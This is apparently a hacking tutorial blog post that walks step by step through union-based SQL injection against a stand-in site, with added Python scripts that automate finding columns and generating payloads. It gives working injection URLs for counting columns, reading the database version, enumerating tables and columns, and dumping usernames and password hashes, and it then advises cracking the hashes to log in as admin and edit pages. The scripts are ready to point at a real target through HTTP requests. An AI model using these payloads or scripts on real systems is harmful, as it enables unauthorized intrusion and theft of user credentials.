Today I will explain SQL injection. Input-based attacks are the most effective way to test web security, and SQL injection is the most popular one for web hacking. Let's start. (I am not going to explain what SQL injection is; this post is about how to exploit it.)
Testing if the target is vulnerable :
Suppose the target site is http://www.victim.com. We can quickly gather some information with Google to find parameter-based URLs. Simply go to Google and search for:
site:www.victim.com filetype:php
(Note: I assume you have already gathered some information about the site, so you know which file extension it uses. If you are attacking randomly, go away from here.)
Then we see many results like:
www.victim.com/index.php
www.victim.com/something.php?id=3
etc
Simply browse to www.victim.com/something.php?id=3 and append one more character, a single quote ('). Example:
www.victim.com/something.php?id=3'
If the site is vulnerable, we will see a SQL error like:
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near '' AND products.obsolete='N'' at line 1
If we see this error on the page, we have confirmed that the site is vulnerable and very likely exploitable. (No visible error does not prove the site is safe; errors may be hidden, in which case the injection is "blind" and needs other techniques that this post does not cover.)
Next ATTACK
Finding the column number:
First we check how many columns the query returns using "ORDER BY n". Once n is greater than the number of available columns we get an error like "Unknown column '7' in 'order clause'". Note that the MySQL "--" comment needs a space after it, and a trailing space is dropped from a URL, so in practice type "--+" or "-- -" (or "%23", which is "#") at the end of the injected URL.
No error:
www.victim.com/something.php?id=3 ORDER BY 5--
No error:
www.victim.com/something.php?id=3 ORDER BY 6--
Error:
www.victim.com/something.php?id=3 ORDER BY 7--
Now we know that it has 6 columns: the last number that did not error. If you get no error, try more columns: 8, 9, etc.
How to find the vulnerable column
To find which columns are printed on the page we need "UNION SELECT". Negate the id (id=-3) so the original query returns no row and only our UNION row is displayed:
www.victim.com/something.php?id=-3 UNION SELECT 1,2,3,4,5,6--
Now we will see one or more of the numbers 1-6 on the page. Suppose we see "5".
So now we know that column number 5 is reflected on the page; this is the "vulnerable" column we will use to read data.
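Both steps above (counting columns with ORDER BY, then finding which UNION marker is printed) are easy to automate. The script below is an added example, not code from the original post: it includes a constructed stand-in for something.php (a six-column SELECT over an in-memory SQLite table that pastes the id parameter straight into the query, just like the vulnerable page would), and the attacker-side functions walk ORDER BY upward and then read the reflected column. The markers 7001..7006 instead of 1..6 are my choice, to avoid matching ordinary digits on the page; the error signatures and the SQLite backend are assumptions for the demo, and against a real MySQL target you would swap sqlite_version() for @@version.

```python
import sqlite3

# --- constructed stand-in for www.victim.com/something.php?id=... ---------
def _make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL,"
                 " stock INTEGER, descr TEXT, sku TEXT)")
    conn.execute("INSERT INTO products VALUES (3, 'Widget', 9.99, 12,"
                 " 'A basic widget', 'W-3')")
    return conn

_DB = _make_db()

def vulnerable_page(id_param: str) -> str:
    """Render the page for ?id=<id_param>: string concatenation, no escaping,
    and only columns 2 (name) and 5 (descr) are shown in the HTML."""
    sql = ("SELECT id, name, price, stock, descr, sku FROM products WHERE id="
           + id_param)
    try:
        rows = _DB.execute(sql).fetchall()
    except sqlite3.Error as exc:            # the page leaks the DB error
        return f"<p>Database error: {exc}</p>"
    return "".join(f"<h1>{r[1]}</h1><p>{r[4]}</p>" for r in rows)

# --- attacker side ------------------------------------------------------------
# Assumed error signatures: the MySQL text quoted in the post plus the
# SQLite and demo-page messages. Extend for the target you are testing.
ERROR_SIGNATURES = ("You have an error in your SQL syntax",
                    "ORDER BY term out of range", "Database error")

def is_error(body: str) -> bool:
    return any(sig in body for sig in ERROR_SIGNATURES)

def find_column_count(fetch, base_id: str = "3", max_cols: int = 50) -> int:
    """Walk ORDER BY n upward; the last n that did not error is the count."""
    for n in range(1, max_cols + 1):
        if is_error(fetch(f"{base_id} ORDER BY {n}--")):
            if n == 1:
                raise RuntimeError("ORDER BY 1 already errors; not a SELECT?")
            return n - 1
    raise RuntimeError(f"no error up to ORDER BY {max_cols}")

def _markers(ncols: int) -> list[str]:
    # 7001..7006: distinctive enough not to collide with digits already on the page
    return [str(7000 + k) for k in range(1, ncols + 1)]

def find_reflected_columns(fetch, ncols: int, base_id: str = "3") -> list[int]:
    """Negate the id so only our UNION row renders, then see which markers show."""
    body = fetch(f"-{base_id} UNION SELECT {','.join(_markers(ncols))}--")
    if is_error(body):
        raise RuntimeError("UNION SELECT failed: " + body)
    return [k for k, m in enumerate(_markers(ncols), 1) if m in body]

def union_extract(fetch, ncols: int, column: int, expression: str,
                  base_id: str = "3") -> str:
    """Put an SQL expression into a reflected column and return the page body."""
    fields = _markers(ncols)
    fields[column - 1] = expression
    return fetch(f"-{base_id} UNION SELECT {','.join(fields)}--")

if __name__ == "__main__":
    n = find_column_count(vulnerable_page)
    cols = find_reflected_columns(vulnerable_page, n)
    print("columns:", n, "reflected:", cols)
    # sqlite_version() stands in for MySQL's @@version in this demo
    print(union_extract(vulnerable_page, n, cols[0], "sqlite_version()"))
```

Running it prints "columns: 6 reflected: [2, 5]" followed by the page with the database version in place of the product name. Against a real target, replace vulnerable_page with a function that performs the HTTP request and returns the response body; everything else stays the same.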
Checking the MySQL version:
www.victim.com/something.php?id=-3 UNION SELECT 1,2,3,4,@@version,6--
The page now prints the version string in place of column 5. We need MySQL 5 or later: the information_schema database used in the next steps does not exist in version 4, so the queries below won't work there.
Great! Now we quickly need a dump of their users database. So quick!!!
First we need all the table names in the current database.
Getting table names:
www.victim.com/something.php?id=-3 UNION SELECT 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=database()--
So we get several table names. For example we get:
links
pages
tokens
users
visitor
creditcard
userstransaction
etc...
We want to log in as a powerful user so that we can edit their pages. To do this we first need to find out the column names of the users table:
Getting column names:
www.victim.com/something.php?id=-3 UNION SELECT 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name=0x7573657273--
(0x7573657273 is the hex form of the string 'users'; MySQL accepts a hex literal anywhere a quoted string is expected, so we don't need quotes that the application might escape.)
So from this query we get output like:
id
username
firstname
lastname
password
link
It is simple to understand that we need the username and password columns to get admin access:
Grabbing the username and password:
www.victim.com/something.php?id=-3 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6 from users--
(0x3a is ':', used as the separator between username and password. Keep in mind that group_concat output is cut off at group_concat_max_len, 1024 characters by default, so on a large users table use LIMIT/OFFSET to read the rows in pieces.)
So we get all the usernames and password hashes as output, like: admin:akde3d09kd4ur489deqa9094ldad48dkr
super:54ee3d09kd4ur489deqa9094ldad4u78l
Now crack the hash and log in with username "admin" or "super" and the cracked plaintext password.
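The whole enumeration chain above (version, tables, columns, credentials) differs only in the expression placed in the reflected column and the FROM/WHERE part, so it is worth generating the payloads instead of retyping them. This is an added example, not code from the original post; it assumes six columns with column 5 reflected, a users table with username and password columns (as in the example output above), and uses "-- -" as the comment terminator so the trailing space survives URL handling. hex_literal builds the 0x... form of a string, and parse_credentials splits the username:hash dump and flags the 1024-character group_concat truncation.

```python
from urllib.parse import quote

def hex_literal(s: str) -> str:
    """MySQL accepts 0x.. where a quoted string is expected, so
    table_name=0x7573657273 works even if the application escapes quotes."""
    return "0x" + s.encode().hex()

def union_payload(ncols: int, column: int, expression: str,
                  from_clause: str = "", comment: str = "-- -") -> str:
    """Build ?id=-3 UNION SELECT 1,..,<expression>,..,N <from_clause> -- -"""
    fields = [str(k) for k in range(1, ncols + 1)]
    fields[column - 1] = expression
    sql = f"-3 UNION SELECT {','.join(fields)}"
    if from_clause:
        sql += " " + from_clause
    return f"{sql} {comment}"

def enumeration_payloads(ncols: int, column: int, table: str = "users",
                         user_col: str = "username",
                         pass_col: str = "password") -> dict[str, str]:
    """The four stages of the post, in order, as raw (not yet URL-encoded) payloads."""
    return {
        "version": union_payload(ncols, column, "@@version"),
        "tables": union_payload(
            ncols, column, "group_concat(table_name)",
            "FROM information_schema.tables WHERE table_schema=database()"),
        "columns": union_payload(
            ncols, column, "group_concat(column_name)",
            f"FROM information_schema.columns WHERE table_name={hex_literal(table)}"),
        "creds": union_payload(
            ncols, column, f"group_concat({user_col},0x3a,{pass_col})",
            f"FROM {table}"),
    }

def to_url(base: str, param: str, payload: str) -> str:
    """URL-encode everything so spaces, commas and '@' survive the request."""
    return f"{base}?{param}={quote(payload, safe='')}"

def parse_credentials(dump: str, max_len: int = 1024) -> tuple[list[tuple[str, str]], bool]:
    """Split 'user:hash,user:hash' into pairs. group_concat output is silently
    cut at group_concat_max_len (default 1024), so a dump of that length is
    almost certainly incomplete and the last pair may be mangled."""
    pairs = [tuple(entry.split(":", 1)) for entry in dump.split(",") if entry]
    truncated = len(dump) >= max_len
    return pairs, truncated

if __name__ == "__main__":
    base = "http://www.victim.com/something.php"   # target from the post
    for stage, payload in enumeration_payloads(6, 5).items():
        print(f"{stage}: {to_url(base, 'id', payload)}")
    # constructed sample of what the creds stage returns
    print(parse_credentials("admin:akde3d09kd4ur489deqa9094ldad48dkr,"
                            "super:54ee3d09kd4ur489deqa9094ldad4u78l"))
```

If parse_credentials reports truncation, re-run the creds stage with "FROM users LIMIT 20 OFFSET 20" and so on in the from_clause until the dump comes back shorter than the limit.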
If you don't know how to crack a hash, check out the other articles...
There are many SQL injection techniques... I explained here the one that is very common. So try more, research and research.
I am sure there are some mistakes I made... If you catch them, feel free to contact me.
Good luck!!!